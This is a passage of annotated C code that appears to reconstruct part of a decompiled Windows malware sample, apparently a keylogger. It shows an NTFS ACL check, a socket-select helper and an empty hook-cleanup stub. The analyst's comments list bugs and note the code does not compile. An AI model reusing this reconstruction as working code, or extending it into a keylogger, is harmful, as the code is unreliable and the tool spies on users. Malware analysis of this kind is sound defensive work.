// first, then its size); `FileSystemFlags==FILE_PERSISTENT_ACLS` is an equality
// test where a bit test (`&`) is meant -- NTFS reports several flags at once,
// so equality would essentially never hold.
bool check_root_drive_info(char lpRootPathName)
{
DWORD FileSystemFlags;
DWORD MaximumComponentLength;
char FileSystemNameBuffer[MAX_PATH];
if(GetVolumeInformation(lpRootPathName,NULL,0,NULL,&MaximumComponentLength,&FileSystemFlags,MAX_PATH,FileSystemNameBuffer))// volume name and serial not requested
{
if(0==lstrcmpA(FileSystemNameBuffer,"NTFS")&&FileSystemFlags==FILE_PERSISTENT_ACLS)// `==` where `&` is meant
{
/*
FILE_PERSISTENT_ACLS,The specified volume preserves and enforces
access control lists(ACL).For example,the NTFS file system preserves
and enforces ACLs,and the FAT file system does not.
*/
return true;
}
}
return false;
}
// select: waits up to `optlen` (a duration; 0x3e8 == 1000) for the global
// socket `sock` (not declared on this page) to become writable or to raise an
// exception -- the usual way to learn whether a non-blocking connect()
// completed. Returns 1 when the socket is writable and not in the exception
// set; when select() returns anything other than 1 it returns the
// getsockopt(SO_ERROR) result OR'ed with 0xff as a non-zero error marker; when
// the exception set fired it falls off the end without a return.
// Transcription notes (the routine does not compile as written): it shadows the
// Winsock select() it calls; `1=select(...)` assigns to a literal; fd_array is
// an array (fd_array[0]=sock, or FD_SET); the two timeout branches look swapped
// (the small-value branch should fill tv_usec, not tv_sec); `&optval` passes the
// address of a char* where an int buffer is expected; `timeval` needs `struct` in C.
int select(DWORD optlen)
{
fd_set writefds;
fd_set exceptfds;
char* optval=NULL;
timeval timeout;
writefds.fd_count=1;
writefds.fd_array=sock;// hand-built fd_set instead of FD_ZERO/FD_SET
exceptfds.fd_count=1;
exceptfds.fd_array=sock;
if(optlen>0x3e8)
{
timeout.tv_usec=0;
timeout.tv_sec=optlen/0x3e8;// milliseconds -> seconds
}
else
{
timeout.tv_usec=0;
timeout.tv_sec=0x3e8*optlen;// as transcribed this makes small values wait *longer*; tv_usec was presumably meant
}
if(1=select(0,NULL,&writefds,&exceptfds,&timeout))// first argument is ignored on Winsock
{
if(0==_WSAFDIsSet(sock,&exceptfds))
{
return _WSAFDIsSet(sock,&writefds)>0?1:0;
}
}
else
{
optlen=4;// sizeof(int) for the SO_ERROR query
return getsockopt(sock,SOL_SOCKET,SO_ERROR,(char*)&optval,&optlen)|0xff;
}
}
// clean_hook_and_key: cleanup called from do_read_mailslot before the collector
// thread exits. The name suggests removing the keyboard hook(s) and the
// registry/config state, but the body was not reconstructed -- TODO confirm
// against the sample. Callers use both Clean_hook_and_key and
// clean_hook_and_key; only this lowercase form is defined.
void clean_hook_and_key(void* lparam)
{
/*
*/
}